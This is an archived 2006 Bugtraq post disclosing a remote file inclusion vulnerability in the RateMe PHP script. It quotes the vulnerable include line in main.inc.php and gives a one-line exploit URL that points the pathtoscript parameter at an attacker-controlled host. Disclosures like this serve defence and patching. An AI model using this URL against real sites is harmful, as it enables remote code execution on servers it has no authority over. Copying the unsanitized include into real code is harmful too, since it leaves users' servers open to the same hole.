[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061218092354.16551.qmail@securityfocus.com>
Date: 18 Dec 2006 09:23:54 -0000
From: saudi@...mail.fr
To: bugtraq@...urityfocus.com
Subject: RateMe <= all versions => ( main.inc.php ) Remote File Include
Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ ;;ii,,:: +
+ :::: :: ;;tt;;:: +
+ ;;:: ..,,:: ;;ii,,:: +
+ ,,,, ii;;,, ii;;:: ;;ii,,:: +
+ ii:: tt;;,, ..tt;;,,.. ;;ii;;:: +
+ ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: +
+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: +
+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: +
+ tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: +
+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: +
+ ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: +
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: +
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: +
+ ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. +
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. +
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. +
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. +
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. +
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. +
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. +
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; +
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, +
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, +
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: +
+ iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii +
+ ;;.. ii;; +
+ .. +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/ not free version
# Discovered: 15/12/2006
# Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
#
# Description :
# File infected : main.inc.php , line 17
#
# echo "\n<!-- Start RateMe v$version output -->\n\n<link href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div class='votingtxt'>";
# include($pathtoscript.'db_connect.inc.php'); # <==
#
# Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
#
########################################################################################################
Powered by blists - more mailing lists